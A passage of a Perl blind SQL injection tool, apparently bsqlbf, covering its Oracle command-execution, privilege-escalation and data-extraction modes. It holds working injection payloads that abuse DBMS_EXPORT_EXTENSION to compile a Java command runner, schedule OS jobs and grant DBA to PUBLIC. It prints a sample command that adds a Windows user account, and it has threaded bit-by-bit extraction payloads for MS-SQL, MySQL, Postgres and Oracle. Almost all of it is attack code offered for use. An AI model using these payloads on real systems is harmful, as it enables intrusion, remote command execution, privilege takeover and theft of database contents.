810.   } else {
811.     print "NO errors encountered.......\n";
812.     print "SUCCESS: I have created the function sys.LinxReadFile()....\n";
813.     print "Now I will launch bsqlbf again to use this function and read the file you asked me to read....:)\n";
814.     print "--------------------------------\n";
815.    
816. # print $content;
817. }
818.  
819. #-----------------------
820. #print "Step 5. RIGHT!!!, by now we should have a function sys.LinxRunCMD through which we can execute commands...\n";
821. #print "--------------------------------\n";
822. #print "You should be able to execute this function as:\nselect sys.LinxRunCMD('cmd.exe /c net user notsosecure n0ts3cur3 /add') from dual\n";
823. #print "I will execute the command you told me to execute... you won't be able to see the output though :( \n";
824. #my $url=$url_1.$cmd_exec;
825. #my $content = get_or_post($method,$url,$cookie,$proxy);
826. #die "Couldn't get $url" unless defined $content;
827. #
828. #
829. #  if(! ($content =~ m/($match)/i)) {
830. #   print "-----------------------------------------------\n";
831. #    print "ERROR at STAGE 5 occured !!!...something was not right.. \n";
832. #   print "-----------------------------------------------\n";
833. #   print "...You need to investigate buddy....\n";
834. #   exit 0;
835. #  } else {
836. #   print "-----------------------------------------------\n";
837. #   print "SUCCESS: I have created the function sys.LinxReadFile()....\n";
838. #   print "Now I will launch bsqlbf again to use this function and read the file you asked me to read....:)\n";
839. #   print "-----------------------------------------------\n";
840. #
841. #  }   
842. #-----------------------
843. #print "Step 6. Droping function sys.LinxRunCMD...\n";
844. #my $url=$url_1.$cmd_exec_func_unpriv;
845. #my $content = get_or_post($method,$url,$cookie,$proxy);
846. #die "Couldn't get $url" unless defined $content;
847. #
848. #  if(! ($content =~ m/($match)/i)) {
849. #   print "-----------------------------------------------\n";
850. #    print "ERROR at STAGE 6 occured !!!...something was not right.. \n";
851. #   print "-----------------------------------------------\n";
852. #   print "!!!!WARNING:I have not been able to drop the function..!!!!!!\n";
853. #   exit 0;
854. #  } else {
855. #   print "Function dropped..\n";
856. #   exit 0;
857. #}
858.    
859.  
860.  
861.  
862.  
863.  
864.  
865.  
866.  
867.  
868.  
869. }
870.  
871. ####################### Type 5 stops here #########################################
872.  
873.  
874. ############################ Type 4###########################################
875.     if($type==4)
876.     {
877.        
878.        
879.         print "--------------------------------\n";
880.         print "Oracle O.S command execution\n";
881.         print "\n\n!!!!Note!!!!: Please provide the vulnerable parameter as the last parameter\n";
882.         print "Supported versions <=:\n(Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2, XE)\n\n";
883.         print "--------------------------------\n\n\n";
884.         print "String to Match: ".$match."\n";
885.        
886.         #-----ora_cmd.pl--starts here
887. ################################## S Type: 0########################################
888.         if ($stype==0) {
889.        
890.         print "You asked me to execute \"".$cmd."\" on remote box with stype:".$stype."\n";
891.         print "--------------------------------\n\n\n";
892.  
893. my $url_1 = $url." and ";
894. my $javalib="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named \"LinxUtil\" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str %2b=stemp%2b\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str %2b=stemp%2b\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
895.  
896. my $javaperm="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
897.  
898. my $cmd_exec_func="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
899.  
900. my $cmd_exec_func_priv="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
901. my $cmd_exec_func_unpriv="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual)is null--";
902.  
903. my $cmd_1=$cmd;
904. my $cmd_exec="(select sys.LinxRunCMD('cmd.exe /c". $cmd_1. "') from dual) is null--";
905.  
906. print "Step 1. Creating Java Library...\n";
907. #print "--------------------------------\n";
908. my $url=$url_1.$javalib;
909. #print $method;
910. #print $url;
911. my $content = get_or_post($method,$url,$cookie,$proxy);
912. die "Couldn't get $url" unless defined $content;
913.  
914.  
915.   if(! ($content =~ m/($match)/i)) {
916.     print "-----------------------------------------------\n";
917.     print "ERROR at STAGE 1 occured !!!...did you provide me the URL in the format, i want?? \n";
918.     print "-----------------------------------------------\n";
919.   } else {
920.     print "NO errors encountered.....proceeding to step..2\n";
921.     print "--------------------------------\n";
922.    
923. # print $content;
924. }
925.  
926. #-----------------------
927. print "Step 2. granting java execute privileges...\n";
928. my $url=$url_1.$javaperm;
929. my $content = get_or_post($method,$url,$cookie,$proxy);
930. die "Couldn't get $url" unless defined $content;
931.  
932.  
933.   if(! ($content =~ m/($match)/i)) {
934.     print "-----------------------------------------------\n";
935.     print "ERROR at STAGE 2 occured !!!...something was not right.. \n";
936.     print "-----------------------------------------------\n";
937.     print "I will proceed, however, there is a possibility that the attack will fail\n";
938.   } else {
939.     print "NO errors encountered.....proceeding to step..3\n";
940.     print "--------------------------------\n";
941.    
942. # print $content;
943. }
944.  
945. #-----------------------
946. print "Step 3. creating funtion for command execution...\n";
947. my $url=$url_1.$cmd_exec_func;
948. my $content = get_or_post($method,$url,$cookie,$proxy);
949. die "Couldn't get $url" unless defined $content;
950.  
951.  
952.   if(! ($content =~ m/($match)/i)) {
953.     print "-----------------------------------------------\n";
954.     print "ERROR at STAGE 3 occured !!!...something was not right.. \n";
955.     print "-----------------------------------------------\n";
956.     print "I will proceed, however, there is a possibility that the attack will fail\n";
957.   } else {
958.     print "NO errors encountered.....proceeding to step..4\n";
959.     print "--------------------------------\n";
960.    
961. # print $content;
962. }
963.  
964. #-----------------------
965. print "Step 4. making function executable by all users...\n";
966. my $url=$url_1.$cmd_exec_func_priv;
967. my $content = get_or_post($method,$url,$cookie,$proxy);
968. die "Couldn't get $url" unless defined $content;
969.  
970.  
971.   if(! ($content =~ m/($match)/i)) {
972.     print "-----------------------------------------------\n";
973.     print "ERROR at STAGE 4 occured !!!...something was not right.. \n";
974.     print "-----------------------------------------------\n";
975.     print "I will proceed, however, there is a possibility that the attack will fail\n";
976.   } else {
977.     print "NO errors encountered.....proceeding to step..5\n";
978.     print "--------------------------------\n";
979.    
980. # print $content;
981. }
982.  
983. #-----------------------
984. print "Step 5. RIGHT!!!, by now we should have a function sys.LinxRunCMD through which we can execute commands...\n";
985. print "--------------------------------\n";
986. print "You should be able to execute this function as:\nselect sys.LinxRunCMD('cmd.exe /c net user notsosecure n0ts3cur3 /add') from dual\n";
987. print "I will execute the command you told me to execute... you won't be able to see the output though :( \n";
988. my $url=$url_1.$cmd_exec;
989. my $content = get_or_post($method,$url,$cookie,$proxy);
990. die "Couldn't get $url" unless defined $content;
991.  
992.  
993.   if(! ($content =~ m/($match)/i)) {
994.     print "-----------------------------------------------\n";
995.     print "ERROR at STAGE 5 occured !!!...something was not right.. \n";
996.     print "-----------------------------------------------\n";
997.     print "...You need to investigate buddy....\n";
998.   } else {
999.     print "-----------------------------------------------\n";
1000.     print "SUCCESS: Your command executed on the box....:)\n";
1001.     print "-----------------------------------------------\n";
1002.  
1003.   }
1004. #-----------------------
1005. print "Step 6. Droping function sys.LinxRunCMD...\n";
1006. my $url=$url_1.$cmd_exec_func_unpriv;
1007. my $content = get_or_post($method,$url,$cookie,$proxy);
1008. die "Couldn't get $url" unless defined $content;
1009.  
1010.   if(! ($content =~ m/($match)/i)) {
1011.     print "-----------------------------------------------\n";
1012.     print "ERROR at STAGE 6 occured !!!...something was not right.. \n";
1013.     print "-----------------------------------------------\n";
1014.     print "!!!!WARNING:I have not been able to drop the function..!!!!!!\n";
1015.     exit 0;
1016.   } else {
1017.     print "Function dropped..\n";
1018.     exit 0;
1019. }
1020.     }
1021.   # this completes stype=0
1022.        
1023.  
1024. ###############################---stype 0--- stops here##########################
1025.  
1026. ###############################---stype 1--- starts here##########################
1027.  
1028.  
1029.         if ($stype==1) {
1030.             print "Command execution in oracle 9 with plsql_native_make_utility.. not yet ready..:(\n";
1031.         exit 0;
1032.         }
1033.  
1034.  
1035.  
1036. ###############################---stype 1--- stops here##########################
1037.  
1038. ###############################-stype 2--starts here--##############################
1039.         if ($stype==2) {
1040.             print "O.S command execution with dbms_scheduler\n";
1041.             print "\n\n!!NOTE:!!! Supply commands with full paths such as:\n";
1042.             print "c:\\WINDOWS\\system32\\cmd.exe /c c:\\whoami.exe >> c:\\bsql.txt\n\n\n";
1043.             if ($cmd eq "ping 127.0.0.1") {
1044.              $cmd = "C:\\windows\\system32\\cmd.exe /c C:\\windows\\system32\\whoami.exe >> C:\\notsosecure.txt";
1045.              print "Executing default cmd: ".$cmd. "\n";
1046.             }
1047.             #------ora_cmd_v10.pl startes here------
1048.  
1049.  
1050. my $cmd_1=$cmd;
1051. my $url_1 = $url." and ";
1052. my $step1="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' begin DBMS_SCHEDULER.create_program(''''''''bsql5'''''''',''''''''EXECUTABLE'''''''',''''''''".$cmd_1."'''''''',0,TRUE); end;'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
1053.  
1054. my $step2="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin DBMS_SCHEDULER.create_job(job_name => ''''''''bsql5job'''''''',program_name => ''''''''bsql5'''''''',start_date => NULL,repeat_interval => NULL,end_date => NULL,enabled => TRUE,auto_drop => TRUE); end;'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
1055.  
1056. my $step3="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' begin DBMS_SCHEDULER.drop_program(PROGRAM_NAME => ''''''''bsql5''''''''); end; '''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
1057.  
1058. #my $cmd_exec_func_priv="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD
1059. #to public'''';END;'';END;--','SYS',0,'1',0) from dual)--";
1060.  
1061.  
1062. #my $cmd_exec="(select sys.LinxRunCMD('cmd.exe /c". $cmd_1. "') from dual)--";
1063.  
1064. print "Step 1...Creating job........\n";
1065. print "--------------------------------\n";
1066. my $url=$url_1.$step1;
1067. #print $method;
1068. my $content = get_or_post($method,$url,$cookie,$proxy);
1069. die "Couldn't get $url" unless defined $content;
1070.  
1071.  
1072.   if(! ($content =~ m/($match)/i)) {
1073.     print "-----------------------------------------------\n";
1074.     print "ERROR at STAGE 1 occured !!!...did you provide me the URL in the format, i want?? \n";
1075.     print "-----------------------------------------------\n";
1076.   } else {
1077.     print "\nNO errors encountered.....proceeding to step..2\n";
1078.     print "--------------------------------\n";
1079.    
1080.  #print $content;
1081. }
1082.  
1083. #-----------------------
1084. print "Step 2.....Executing Job......\n";
1085. print "I will execute the command you told me to execute... you won't be able to see the output though :( \n";
1086. my $url=$url_1.$step2;
1087. #print $url."\n";
1088. my $content = get_or_post($method,$url,$cookie,$proxy);
1089. die "Couldn't get $url" unless defined $content;
1090.  
1091.  
1092.   if(! ($content =~ m/($match)/i)) {
1093.     print "-----------------------------------------------\n";
1094.     print "ERROR at STAGE 2 occured !!!...something was not right.. \n";
1095.     print "-----------------------------------------------\n";
1096.     print "I will proceed, however, there is a possibility that the attack will fail\n";
1097. #   print $content;
1098.   } else {
1099.     print "NO errors encountered.....proceeding to step..3\n";
1100.     print "--------------------------------\n";
1101.     #print $content;
1102. }
1103.  
1104. #-----------------------
1105.  
1106.  
1107. print "\nStep 3. Removing Job...\n";
1108. print "----------sleeping for 15 secs-----------------------------\n";
1109. sleep(15);
1110. my $url=$url_1.$step3;
1111. my $content = get_or_post($method,$url,$cookie,$proxy);
1112. die "Couldn't get $url" unless defined $content;
1113.  
1114.  
1115.   if(! ($content =~ m/$match/i)) {
1116.     print "-----------------------------------------------\n";
1117.     print "ERROR at Step 3 occured !!!...something was not right.. \n";
1118.     print "-----------------------------------------------\n";
1119.     print "...You need to investigate buddy....\n";
1120.     print $content;
1121.    
1122.   } else {
1123.     print "-----------------------------------------------\n";
1124.     print "SUCCESS: Your command executed on the box....:)\n";
1125.     print "-----------------------------------------------\n";
1126.    
1127. # print $content;
1128. }
1129.  
1130.  
1131.             #------ora_cmd_v10.pl stops here------
1132.                
1133.                
1134.                
1135.                
1136.                
1137.                
1138.                
1139.                
1140.                
1141.                
1142.                 exit 0;}   
1143.                
1144. ###############---stype 2---stops here-------##########################
1145.  
1146.         }
1147.  
1148. ######################---type 4 stops here##############################
1149.        
1150.        
1151.    
1152.                        
1153.                
1154. ########################--type 3 starts here---###########################
1155. if($type==3)
1156.     {
1157.         print "--------------------------------\n";
1158.         print "Oracle Privilege escalation\n\n";
1159.         print "Supported versions less <=:\n(Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2, XE)\n\n";
1160.         print "--------------------------------\n";
1161.         print "\n\n!!!Note:!!! Please provide the vulnerable parameter as the last parameter\n";
1162.         print "I will \"GRANT DBA TO PUBLIC\" and Later REVOKE it back\n\n";
1163.         print "--------------------------------\n";
1164.         print "String to match: ".$match."\n";
1165.  
1166.  
1167. my $grantdbatopub=" and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' grant dba to public'''';END;'';END;--','SYS',0,'1',0) from dual) is null --";
1168.  
1169. #my $grantpriv=" and 1=(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on linx_query to public'''';END;'';END;--','SYS',0,'1',0) from dual)--";
1170. my $url_1=$url.$grantdbatopub;
1171. print "\n...sending request..\n";
1172. print "\n";
1173.  
1174.  
1175. my $content;
1176. $content = get_or_post($method,$url_1,$cookie,$proxy);
1177. die "Couldn't get $url" unless defined $content;
1178. my $match_1 eq "Warning";
1179.  
1180. if (!$match) {
1181.     print "you did not supply any match string, i will look for Warning keyword..\n";
1182.     print "tying to match:".$match_1."\n";}
1183.  
1184.   if(! ($content =~ m/$match/i)) {
1185.         print "-----------------------------------------------\n";
1186.     die "ERROR occured !!!...did you provide me the URL in the format, i want?? \n";
1187.         print "-----------------------------------------------\n";
1188.         die "cannot proceed";  
1189.   } else {
1190.               print "--------------------------------\n";
1191.               print "No Errors Encountered...We are DBA now....\n";
1192.               print "--------------------------------\n";
1193.  
1194.   }
1195.  
1196.  
1197.     }
1198.  
1199. #################### Type 3 stops here#################################
1200.  
1201. ( ! $get) ? sqlget() : fileget();
1202.  
1203. my @byte = ();
1204. my $wait_me;
1205.  
1206. sub getbyte {
1207.    my $sql = $_[0];
1208.    my $bit="";
1209.    my @thread_count = ();
1210.    my $c = 8;
1211.    my $i = 0;
1212.    $high = 128 unless $ascii;#) ? 128 : { 64; $byte[0] = 0; };
1213.    $wait_me = 0;
1214.  
1215.    share($wait_me);
1216.    share (@byte);
1217.  
1218.    if ($ascii) {
1219.      $byte[0] = 0;
1220.      $high = 64;
1221.    }
1222.    for ($bit=1;$bit<=$high;$bit*=2) {
1223. # launch thread ->
1224.     $thread_count[$i] = threads->create(\&launch_thread ,$sql, $bit, $c);
1225.     $thread_count[$i]->detach;
1226.     $c--;
1227.    }
1228.  
1229.    while ($wait_me <= 7) {
1230.     usleep(50);
1231.     #sleep(1);# if !$dontsleep;
1232.    }
1233.  
1234.    my $str = join("",@byte);
1235.    #print "\nSTR: $str\n";
1236.    return pack("B*","$str");
1237.  
1238. }
1239.  
1240. sub launch_thread {
1241.     my ($sql, $bit, $c) = @_;
1242.     my $val;   
1243.     my $and="%26";
1244.      if (lc($method) eq "post"){
1245.      $and="&";
1246.      }
1247.      ###------------MS-SQL BLOCK STARTS HERE---------------------###
1248.  
1249. if ($database==0) {
1250.  
1251.  
1252. #print "I am here";
1253.         if ($url =~ /'$/) {
1254.       ##   $val = "$head and (ASCII($sql) $and $bit)=0-- $tail";
1255.  if ($type==1)
1256.                       {
1257.                          $val = "$head and (select case when((ASCII($sql) $and $bit) =0) then 1 else 1/0 end )=1-- $tail";
1258.                       }
1259.               else {    if($type==0)
1260.                       {    
1261.               $val = "$head and (ASCII($sql) $and $bit)=0-- $tail";
1262.                       }
1263.  
1264.                       else {    if($type==2)
1265.                       {    
1266.                          $val = "$head,(select case when((ASCII($sql) $and $bit) =0) then 1 else 1/0 end )=1-- $tail";
1267.                       }
1268.                    }  
1269.  
1270.     }}
1271.                   else{
1272.                        if ($type==1)
1273.                       {
1274.                          $val = "$head and (select case when ((ASCII($sql) $and $bit) =0)then 1 else 1/0 end)=1 $tail";
1275.                       }
1276.               else {    if($type==0)
1277.                       {    
1278.               $val = "$head and (ASCII($sql) $and $bit)=0 $tail";
1279.                       }
1280.                      
1281.                        else {   if($type==2)
1282.                       {    
1283.                          $val = "$head,(select case when((ASCII($sql) $and $bit) =0) then 1 else 1/0 end )=1 $tail";
1284.                       }
1285.                    }  
1286.                    }  
1287.                
1288.                   }
1289.  
1290.  
1291.                 }
1292.  
1293.  
1294.      ###------------MS-SQL BLOCK STOPS HERE---------------------###
1295.      ###----------POSTGRES BLOCK STARTS HERE---------------------###
1296.  
1297. if ($database==2) {
1298.  
1299.  
1300.  
1301.         if ($url =~ /'$/) {
1302.    
1303.  if ($type==1)
1304.    
1305.                       {
1306.                          $val = "$head and (case when ((ASCII($sql) $and $bit) =0) then 1 else (1 * (select 1 from information_schema.tables)) end)=1-- $tail";
1307.                       }
1308.               else {    if($type==0)
1309.                       {    
1310.               $val = "$head and (ASCII($sql) $and $bit)=0-- $tail";
1311.                       }
1312.                    
1313.                    else {   if($type==2)
1314.                       {    
1315.                          $val = "$head,(case when ((ASCII($sql) $and $bit) =0) then 1 else (1 * (select 1 from information_schema.tables)) end)-- $tail";
1316.                       }
1317.                    }  
1318.                    }  
1319.  
1320.  
1321.  
1322.     }
1323.                   else{
1324.                        if ($type==1)
1325.                       {
1326.                          $val = "$head (case when ((ASCII($sql) $and $bit) =0) then 1 else (1 * (select 1 from information_schema.tables)) end) $tail";
1327.                       }
1328.               else {    if($type==0)
1329.                       {    
1330.               $val = "$head and (ASCII($sql) $and $bit)=0 $tail";
1331.                       }
1332.  else { if($type==2)
1333.                       {    
1334.                          $val = "$head,(case when ((ASCII($sql) $and $bit) =0) then 1 else (1 * (select 1 from information_schema.tables)) end) $tail";
1335.                       }
1336.  
1337.  
1338.                    }  
1339.  
1340.                    }  
1341.                
1342.                   }
1343.  
1344.  
1345.                 }
1346. ###----------POSTGRES BLOCK STOPS HERE---------------------###
1347. ###----------ORACLE BLOCK STARTS---------------------------####
1348.      if ($database==3) {
1349.      
1350. if ($url =~ /'$/)
1351. {
1352.           if ($type==1)
1353.    
1354.                       {
1355.                          $val = "$head and (select case when BITAND((ASCII($sql)), $bit)=0 then  (select 1 from dual) else 1/0  end from dual)=1-- $tail";
1356.                       }
1357.               else {    if($type==0)
1358.                       {    
1359.                          $val = "$head and BITAND((ASCII($sql)), $bit)=0-- $tail";                 
1360.                         }
1361. else { 
1362.     if($type==2)
1363.                       {    
1364.                          $val = "$head,(select case when BITAND((ASCII($sql)), $bit)=0 then  (select 1 from dual) else 1/0  end from dual)-- $tail";
1365.                       }
1366.       }
1367.  
1368.                    }  
1369.  
1370. }
1371.                  
1372.                   else{
1373.  
1374.  
1375.  
1376.                        if ($type==1)
1377.                       {
1378.                          $val = "$head and (select case when BITAND((ASCII($sql)), $bit)=0 then  (select 1 from dual) else 1/0  end from dual)=1 $tail";
1379.                       }
1380.  
1381.  
1382.                 if($type==0)
1383.                       {    
1384.                $val = "$head and BITAND((ASCII($sql)), $bit)=0 $tail";
1385.                       }
1386.                      
1387.            
1388.                     if($type==2)
1389.                        {       
1390.                          $val = "$head,(select case when BITAND((ASCII($sql)), $bit)=0 then  (select 1 from dual) else 1/0  end from dual) $tail";
1391.                         }
1392.                
1393.                    
1394.                    
1395.                      
1396.                if($type==3)
1397.                   {
1398.                  $val = "$head and 1=(select case when BITAND((ASCII($sql)), $bit)=0 then  (select 1 from dual) else 1/0  end from dual)-- $tail";
1399.  
1400.                   }
1401.  
1402.         }
1403.  
1404.  
1405.  
1406.  
1407.  
1408.  
1409.                   }
1410.  
1411.  
1412. ###----------ORACLE BLOCK STOPS HERE---------------------------####
1413. ###------------MY-SQL BLOCK STARTS HERE---------------------###
1414. #print $database;
1415.    
1416.     if ($database==1) {
1417.    
1418.    
1419.     if ($url =~ /'$/)       {
1420.           if ($type==1)
1421.                       {
1422.                          $val = "$head and (select case when (ord($sql) $and $bit=0 ) then 1 else 1*(select table_name from information_schema.tables)end)='1 $tail";
1423.                       }
1424.  
1425.               else {    if($type==0)
1426.                       {    
1427.               $val = "$head and (ord($sql) $and $bit)='0 $tail";
1428.                       }
1429.                  
1430. # or one may also use #
1431.                        
1432.                         else {  if($type==2)
1433.                       {    
1434.                          $val = "$head,(select case when (ord($sql) $and $bit=0 ) then 1 else 1*(select table_name from information_schema.tables)end)%23 $tail";
1435.                       }
1436.                    }    }
1437.                            
1438.                            
1439.                     }
1440.            
1441.                  
1442.                  
1443.                  
1444.                  
1445.                  
1446.                  
1447.                  
1448.                   else
1449.                      
1450.                 {
1451.                       if ($type==1)
1452.                       {
1453.                          $val = "$head  and (select case when (ord($sql) $and $bit=0 ) then 1 else 1*(select table_name from information_schema.tables)end)=1 $tail";
1454.                       }
1455.               else {if($type==0)
1456.                       {    
1457.               $val = "$head and (ord($sql) $and $bit)=0 $tail";
1458.                       }
1459.                      
1460.                  
1461.  
1462.                     else {  if($type==2)
1463.                       {    
1464.                          $val = "$head,(select case when (ord($sql) $and $bit=0 ) then 1 else 1*(select table_name from information_schema.tables)end) $tail";
1465.                       }
1466.                    }}  
1467.                        
1468.  
1469.                 }
1470. ###-----------MySQL BLOCK ENDS HERE-------------------###
1471.  
1472.  
1473.  
1474.  
1475.  }
1476.                   #print "VAL[$c] $val\n";
1477.         if (lc($method) eq "post") {
1478.                 $vars{$lastvar} = $lastval . $val;
1479.  
1480.         }
1481.         $furl = $url;
1482.         $furl =~ s/($lastvar=$lastval)/$1$val/;
1483.         &createlwp if $rproxy || $ruagent;
1484.         my $html=fetch("$furl");
1485.         $hits++;
1486.         foreach (split(/\n/,$html)) {
1487.         lock @byte;
1488.        
1489.         if ($nomatch)
1490.         { #print "NO match Supplied";
1491.         #print $nomatch;
1492.                 if (/\Q$nomatch\E/) {
1493.                     $byte[$c]=1;
1494.                     last;
1495.                  } else { $byte[$c] = 0; }
1496.                  }
1497.                  
1498.                  else {
1499.                  #print "match supplied";
1500.                   if (/\Q$match\E/) {
1501.                     $byte[$c]=0;
1502.                     last;
1503.                  } else { $byte[$c] = 1; }
1504.                  }
1505.                  
1506.                  
1507.                  }
1508.     lock $wait_me;
1509.     threads->yield();
1510.     $wait_me++;
1511. }
1512.  
1513. sub sqlget                                  {
1514.  
1515.  
1516.     ##--ms-sqlblock--##
1517.  
1518.  
1519.  
1520.  
1521. if ($database==0 ) {
1522.  
1523. my ($fsize,$i,$s);
1524.         $s = "SUBSTRING(cast( len(len ( ($sql) ) )as varchar(100)),1,1)";
1525.     my $lng .= getbyte($s);
1526.     for ($i=1;$i<=$lng;$i++) {
1527.         $s = "SUBSTRING(cast(len(($sql))as varchar(100)),$i,1)";
1528.         $fsize.=getbyte($s);
1529.     }
1530.  
1531.     #print "FSIZE: $fsize\n";
1532.     $length = $fsize. "bytes";
1533.     &bsqlintro();
1534.  
1535.     my $rsize = $start + 1;
1536.     for ($i=$rsize;$i<=$fsize+1;$i++) {
1537.         $s = "substring(cast(($sql)as varchar($fsize)),$i,1)";
1538.         #print "S: $s\n";
1539.         my $byte = getbyte($s);
1540.         $solution .= $byte;
1541.         print $byte;
1542.     }
1543.  
1544.  
1545. }
1546.  
1547.     ##--ms-sql block-finish--##
1548.     ##---oracle block starts--##
1549. if ($database==3)
1550.    
1551.  
1552. {
1553.  
1554.  
1555.  
1556.    
1557.     my ($fsize,$i,$s);
1558.         $s = "SUBSTR(cast(length(length(($sql)))as varchar2(100)),1,1)";
1559.     my $lng .= getbyte($s);
1560.     for ($i=1;$i<=$lng;$i++) {
1561.         $s = "SUBSTR(cast(length(($sql))as varchar2(100)),$i,1)";
1562.         $fsize.=getbyte($s);
1563.     }
1564.  
1565.     #print "Output Length: $fsize\n";
1566.     $length = $fsize. "bytes";
1567.     &bsqlintro();
1568.  
1569.     my $rsize = $start + 1;
1570.     for ($i=$rsize;$i<=$fsize+1;$i++) {
1571.         $s = "substr(cast(($sql)as varchar2($fsize)),$i,1)";
1572.         #print "S: $s\n";
1573.         my $byte = getbyte($s);
1574.         $solution .= $byte;
1575.         print $byte;
1576.     }
1577. }
1578.  
1579.  
1580.     ##---oracle block finish--##
1581. ##--postgres block----##
1582. if ($database==2) {
1583. my ($fsize,$i,$s);
1584.    
1585.         $s = "SUBSTR(cast(length(length(($sql)))as varchar),1,1)";
1586.     my $lng .= getbyte($s);
1587.     for ($i=1;$i<=$lng;$i++) {
1588.         $s = "SUBSTR(cast(length(($sql))as varchar),$i,1)";
1589.         $fsize.=getbyte($s);
1590.     }
1591.  
1592.     print "FSIZE: $fsize\n";
1593.     $length = $fsize. "bytes";
1594.     &bsqlintro();
1595.  
1596.     my $rsize = $start + 1;
1597.     for ($i=$rsize;$i<=$fsize+1;$i++) {
1598.        
1599.         $s = "substr(cast(($sql)as varchar($fsize)),$i,1)";
1600.         #print "S: $s\n";
1601.         my $byte = getbyte($s);
1602.         $solution .= $byte;
1603.         print $byte;
1604.     }
1605.  
1606.  
1607. }
1608.  
1609.     ##--postgres block-finish--##
1610.     ##-mysql block--##
1611.     if ($database==1) {
1612.         my ($fsize,$i,$s);
1613.         $s = "mid(length(length(($sql))),1,1)";
1614.     my $lng .= getbyte($s);
1615.     for ($i=1;$i<=$lng;$i++) {
1616.         $s = "mid(length(($sql)),$i,1)";
1617.         $fsize.=getbyte($s);
1618.     }
1619.    
1620.     #print "FSIZE: $fsize\n";
1621.     $length = $fsize. "bytes";
1622.     &bsqlintro();
1623.  
1624.     my $rsize = $start + 1;
1625.     for ($i=$rsize;$i<=$fsize+1;$i++) {
1626.         $s = "mid(($sql),$i,1)";
1627.         #print "S: $s\n";
1628.         my $byte = getbyte($s);
1629.         $solution .= $byte;
1630.         print $byte;
1631.     }
1632. }
1633.  
1634. ##-mysql-block-##
1635.                                         }
1636.  
1637. #---------------end-------------------#
1638. sub fileget {
1639.     my ($lget,$fstr);
1640.     if ($get =~ m/.*\/(.*)/) {
1641.         $lget = $1; }
1642.         $fstr = "0x".unpack("H*","$get");
1643.     if ($get =~ m/.*\\(.*)/) {
1644.         $lget = $1;
1645.         $fstr = "\"$get\"";
1646.     }
1647.  
1648.     my $rsize = $start + 1;
